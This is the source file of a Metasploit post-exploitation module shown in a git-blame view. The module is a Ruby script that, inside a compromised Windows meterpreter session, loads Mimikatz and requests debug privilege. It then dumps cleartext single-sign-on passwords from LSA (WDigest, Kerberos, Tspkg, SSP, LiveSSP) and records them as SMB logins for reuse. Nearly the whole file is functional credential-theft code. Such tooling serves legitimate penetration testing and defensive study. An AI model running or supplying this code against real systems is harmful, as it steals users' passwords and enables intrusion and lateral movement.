metasploit-framework/modules/post/windows/gather/credentials/sso.rb

158 lines
4.4 KiB
Ruby
Raw Normal View History

2013-05-02 21:08:19 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2013-10-28 19:03:15 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2013-05-02 21:08:19 +00:00
##
require 'msf/core'
2013-05-12 19:50:53 +00:00
require 'msf/core/post/windows/priv'
2013-05-02 21:08:19 +00:00
class Metasploit3 < Msf::Post
2013-09-05 19:44:21 +00:00
include Msf::Post::Windows::Priv
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info(info,
2013-10-28 19:03:15 +00:00
'Name' => 'Windows Single Sign On Credential Collector (Mimikatz)',
'Description' => %q{
2013-09-05 19:44:21 +00:00
This module will collect cleartext Single Sign On credentials from the Local
Security Authority using the Mimikatz extension. Blank passwords will not be stored
in the database.
},
2013-10-28 19:03:15 +00:00
'License' => MSF_LICENSE,
'Author' => ['Ben Campbell'],
2013-10-28 19:03:15 +00:00
'Platform' => ['win'],
'SessionTypes' => ['meterpreter' ]
2013-09-05 19:44:21 +00:00
))
end
def run
if sysinfo.nil?
print_error("This module is only available in a windows meterpreter session.")
return
end
print_status("Running module against #{sysinfo['Computer']}")
if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/)
print_error("x64 platform requires x64 meterpreter and mimikatz extension")
return
end
unless client.mimikatz
vprint_status("Loading mimikatz extension...")
begin
client.core.use("mimikatz")
rescue Errno::ENOENT
print_error("This module is only available in a windows meterpreter session.")
return
end
end
unless is_system?
vprint_warning("Not running as SYSTEM")
debug = client.mimikatz.send_custom_command("privilege::debug")
if debug =~ /Not all privileges or groups referenced are assigned to the caller/
print_error("Unable to get Debug privilege")
return
else
vprint_status("Retrieved Debug privilege")
end
end
vprint_status("Retrieving WDigest")
res = client.mimikatz.wdigest
vprint_status("Retrieving Tspkg")
res.concat client.mimikatz.tspkg
vprint_status("Retrieving Kerberos")
res.concat client.mimikatz.kerberos
vprint_status("Retrieving SSP")
res.concat client.mimikatz.ssp
vprint_status("Retrieving LiveSSP")
livessp = client.mimikatz.livessp
unless livessp.first[:password] =~ /livessp KO/
res.concat client.mimikatz.livessp
else
vprint_error("LiveSSP credentials not present")
end
table = Rex::Ui::Text::Table.new(
'Header' => "Windows SSO Credentials",
'Indent' => 0,
'SortIndex' => 0,
'Columns' =>
[
'AuthID', 'Package', 'Domain', 'User', 'Password'
]
)
unique_results = res.index_by { |r| "#{r[:authid]}#{r[:user]}#{r[:password]}" }.values
unique_results.each do |result|
next if is_system_user? result[:user]
table << [result[:authid], result[:package], result[:domain], result[:user], result[:password]]
report_creds(result[:domain], result[:user], result[:password])
end
print_line table.to_s
end
def report_creds(domain, user, pass)
return if (user.empty? or pass.empty?)
2013-12-21 09:04:02 +00:00
return if pass.include?("n.a.")
2013-09-05 19:44:21 +00:00
# Assemble data about the credential objects we will be creating
credential_data = {
origin_type: :session,
post_reference_name: self.refname,
private_data: pass,
private_type: :password,
session_id: session_db_id,
username: user,
workspace_id: myworkspace_id
}
unless domain.blank?
credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
credential_data[:realm_value] = domain
2013-09-05 19:44:21 +00:00
end
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED,
address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
port: 445,
service_name: 'smb',
protocol: 'tcp',
workspace_id: myworkspace_id
}
create_credential_login(login_data)
2013-09-05 19:44:21 +00:00
end
2013-09-05 19:44:21 +00:00
def is_system_user?(user)
system_users = [
/^$/,
/^DWM-\d$/,
/^ASPNET$/,
/^ASP\.NET V2\.0 Integrated$/,
/^ANONYMOUS LOGON$/,
/^IUSR.*/,
/^IWAM.*/,
/^IIS_WPG$/,
/.*\$$/,
/^LOCAL SERVICE$/,
/^NETWORK SERVICE$/,
/^LOCAL SYSTEM$/
]
2015-09-11 07:21:01 +00:00
system_users.find{|r| user.to_s.match(r)}
2013-09-05 19:44:21 +00:00
end
2013-05-18 15:18:34 +00:00
2013-05-02 21:08:19 +00:00
end
2013-05-18 15:18:34 +00:00